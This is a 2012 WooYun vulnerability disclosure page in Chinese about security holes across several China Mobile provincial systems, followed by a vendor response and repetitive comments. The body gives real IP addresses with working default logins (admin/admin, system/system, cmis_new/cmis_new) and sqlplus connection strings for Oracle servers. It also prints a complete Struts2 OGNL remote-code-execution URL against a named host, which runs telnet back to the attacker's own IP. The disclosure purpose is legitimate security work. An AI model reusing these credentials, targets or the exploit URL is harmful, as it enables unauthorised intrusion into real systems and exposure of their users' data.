当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-08965

漏洞标题:中国移动喜迎香港回归15周年漏洞大礼包

相关厂商:中国移动

漏洞作者: shine

提交时间:2012-06-28 22:33

修复时间:2012-08-12 22:33

公开时间:2012-08-12 22:33

漏洞类型:成功的入侵事件

危害等级:低

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-06-28: 细节已通知厂商并且等待厂商处理中
2012-07-02: 厂商已经确认,细节仅向厂商公开
2012-07-12: 细节向核心白帽子及相关领域专家公开
2012-07-22: 细节向普通白帽子公开
2012-08-01: 细节向实习白帽子公开
2012-08-12: 细节向公众公开

简要描述:


就再发个礼包吧(正好马上香港回归15周年了,祝祖国强盛!)!都几个月了,自己还没发现修复,损失、遭殃的是用户,用户是无辜的!
以下包含:ftp匿名、struts2远程代码执行、oracle数据库服务器弱口令导致服务器root、后台弱口令、应用安全设计缺陷、目录遍历等,如不准确,同理!

详细说明:


先从湖北移动开始吧(有些移动已经发现并已修复的就不发截图了)!

湖北移动一卡通(还没正式运营):
 http://218.200.101.28:8080   admin  admin
引用: WooYun: 中国移动各地暴露黄色预警,其中重庆、贵阳等系统暴露较为严重,局部地区暴露也不容忽视  与当时的重庆移动是一个产品,感觉产品这么设计不好!
如图:





浙江移动在线客服远程代码执行及目录遍历:
http://122.224.69.139:8002/robot/p4pages/related-question.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22%20telnet%20自己的IP%208888%20%22%29%27%29%28\u0023rt%20\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1
今天早上去中国移动投诉,发现浙江移动系统刚翻新,随意就发现了struts2远程代码执行,到处是问题!
如图:





漏洞证明:

以下是ftp匿名、oracle弱口令引发的问题!

衢州移动oracle弱口令,含整个内部邮件系统的
http://211.140.157.123:1158/em  system   system
引用: WooYun: 东北电网某主力调峰电厂燃料管理系统 
sqlplus system/system@211.140.157.123:1521/orcl









宜宾、自贡移动ftp匿名及oracle弱口令(这个公司行政划分,我是根据系统涉及的用户来定义,不准确谅解!)
这个说明一下:一共是两台数据库服务器。发现第一台时,是3000G-4000G的数据,主要上面有些不利于维护人员的某些影片视频,弄到他qq看了一下,年龄与哥相当,想想一份工作都不容易,怕影响他,再加上服务器后来也关闭了,心一软就没发!
但,第二台上又出现同样的问题,当时只有500G的数据,现在又有了3000G数据,加上数据库比较重要而且都过了几个多月了还没自己发现,还是发出来!


第一台(已修复):218.200.176.187
http://218.200.176.187:1158/em
sqlplus cmis_new/cmis_new@218.200.176.187:1521/orbip
如图:











第二台(应该是第二次发现):218.200.175.74
http://218.200.175.74:1158/em
sqlplus cmis_new/cmis_new@218.200.175.74:1521/orbip
如图:





修复方案:


CNCERT对不住了,又要让你们忙一阵了(主要想起当时,被那什么中国移动的处长耍就很是不爽,哥难道还在乎你那破礼物!)!中国移动安全体系在哪里?
尼玛!发个大礼包写得累死人啊!也没奖励的!

版权声明:转载请注明来源 shine@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-07-02 17:44

厂商回复:

CNVD确认漏洞并复现所述情况,已由CNCERT协调中国移动通信集团公司处置(按集团公司流程,应该是分派工单至各分公司)
shine同学的事件集合rank一般无法用正常评分标准,rank 15

最新状态:

暂无

漏洞评价:

评论

  1. 2012-06-28 22:40 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    果然华丽的开场了

  2. 2012-06-28 22:46 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    果然华丽的开场了

  3. 2012-06-28 22:47 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    果然华丽的开场了

  4. 2012-06-28 22:50 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    果然华丽的开场了

  5. 2012-06-28 23:07 | Max ( 实习白帽子 | Rank:45 漏洞数:7 | When you see this sentence, I have been ...)

    果然华丽的开场了

  6. 2012-06-28 23:13 | 斯文的鸡蛋 ( 普通白帽子 | Rank:173 漏洞数:41 | 我在这头,你在那头~)

    果然华丽的开场了

  7. 2012-06-28 23:26 | B1n4ry ( 实习白帽子 | Rank:55 漏洞数:6 )

    果然华丽的开场了

  8. 2012-06-28 23:28 | leehenwu ( 普通白帽子 | Rank:194 漏洞数:24 | 撸·啊·撸)

    果然华丽的开场了

  9. 2012-06-28 23:52 | mastertu ( 路人 | 还没有发布任何漏洞 | 打酱油的)

    果然华丽的开场了

  10. 2012-06-28 23:58 | 断七 ( 路人 | Rank:0 漏洞数:1 | 小心翼翼过2012。。。。)

    这是什么情况,, 我要打破阵形 :)

  11. 2012-06-29 00:18 | Z-0ne 认证白帽子 ( 普通白帽子 | Rank:559 漏洞数:38 | 目前专注于工控安全基础研究,工业数据采集...)

    来点这个比struts神马的给力多了

  12. 2012-06-29 00:29 | hongygxiang ( 普通白帽子 | Rank:115 漏洞数:12 | 蛋疼)

    这个比struts神马的给力多了

  13. 2012-06-29 02:04 | JustBlack ( 路人 | Rank:4 漏洞数:2 | 不要迷恋黄花大油菜。)

    果然华丽的开场了

  14. 2012-06-29 03:07 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    两天不在,乌云炸开了锅。

  15. 2012-06-29 04:34 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊!~又高又肥2个奶奶像地雷)

    我来保持队形果然华丽的开场了

  16. 2012-06-29 04:34 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊!~又高又肥2个奶奶像地雷)

    果然华丽的开场了

  17. 2012-06-29 08:34 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    @zeracker 没你不行啊。

  18. 2012-06-29 08:46 | conqu3r ( 普通白帽子 | Rank:156 漏洞数:21 | 没有思想,没有道德,没有自由,没有人权的...)

    果然华丽的开场了

  19. 2012-06-29 08:50 | goderci ( 普通白帽子 | Rank:542 漏洞数:47 | http://www.yunday.org)

    果然华丽的开场了

  20. 2012-06-29 08:50 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    果然华丽的开场了

  21. 2012-06-29 09:02 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    @shine 哥,你多来点,深入点;督促移动来个安全部门!我等着呢~

  22. 2012-06-29 09:13 | 坏虾 ( 路人 | Rank:28 漏洞数:8 | From Internet,For Internet……BY:坏虾)

    果然华丽的开场了

  23. 2012-06-29 09:17 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    漏洞类型是亮点: 安全体系缺失。 哈哈

  24. 2012-06-29 09:31 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    果然华丽的开场了

  25. 2012-06-29 09:49 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    安全体系缺失 不错!哈哈

  26. 2012-06-29 11:00 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    华丽的开场,一般没有完美的结局 你信不信我信了。

  27. 2012-06-29 11:12 | 小菜 ( 路人 | Rank:6 漏洞数:2 | 菜鸟一个,等有一天变成大牛了,还是叫小菜...)

    果然华丽的开场了

  28. 2012-06-29 11:22 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    @_Evil 所以需要大家的共勉,此事岂是一人之力所能为?如不能所为,即娱乐之! 我对事物平衡的理解,就是:中庸!引用一下《司马法》不当比喻,言:“国虽大,好战必亡;天下虽安,忘战必危。” 希望能推动你们安全环境的平衡而出点小力!哈哈!

  29. 2012-06-29 11:29 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @shine = = I think.

  30. 2012-06-29 11:30 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @shine 。。我知道了,你丫原来是学文科的。

  31. 2012-06-29 11:44 | 凤凰 ( 路人 | Rank:15 漏洞数:6 | 涅磐)

    果然华丽的开场了

  32. 2012-06-29 16:39 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    不好玩...

  33. 2012-06-29 16:55 | Enjoy_Hacking ( 实习白帽子 | Rank:84 漏洞数:8 | 时间无言,如此这般。)

    果然华丽的开场了

  34. 2012-06-29 21:50 | popok ( 普通白帽子 | Rank:117 漏洞数:24 | nothing)

    哈哈,移动不是黑名单了么

  35. 2012-08-01 23:02 | dndx ( 路人 | Rank:15 漏洞数:2 | 高中生)

    http://www.wooyun.org/upload/201206/28221733bf2d3648fd741040b106d80ede72509b.png这个打码的是什么文件?...

  36. 2012-08-12 22:51 | LaTCue ( 普通白帽子 | Rank:105 漏洞数:27 | 满脑子的艺术细菌,当然,是人体艺术。)

    果然华丽的开场了

  37. 2012-08-12 23:02 | Seay ( 实习白帽子 | Rank:65 漏洞数:8 )

    果然华丽的开场了

  38. 2012-08-12 23:30 | safe121 ( 实习白帽子 | Rank:98 漏洞数:11 | http://www.gov.cn)

    第8张图亮了~安全体系缺失,太狠了

  39. 2012-08-13 00:00 | 禽兽大叔 ( 实习白帽子 | Rank:83 漏洞数:22 | 不抛弃,不放弃)

    @xsser 老大审核下淘宝过旺钓鱼

  40. 2012-08-13 00:56 | xiaokinghk ( 实习白帽子 | Rank:82 漏洞数:16 | 【DBA】)

    哇 各种开场。。。。

  41. 2012-08-13 09:32 | koohik ( 普通白帽子 | Rank:542 漏洞数:63 | 没什么介绍的http://www.koohik.com/)

    这个太给力了

  42. 2012-08-13 10:37 | xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐,我猥琐故我强大)

    果然华丽的开场了

  43. 2012-08-13 13:38 | 子墨 ( 普通白帽子 | Rank:194 漏洞数:22 | 天地不仁,以万物为刍狗;圣人不仁,以百姓为...)

    果然华丽的开场了...我在想,@shine是怎么发现这些弱口令的?

  44. 2013-02-13 10:44 | 高斯 ( 路人 | Rank:16 漏洞数:4 )

    果然华丽的开场了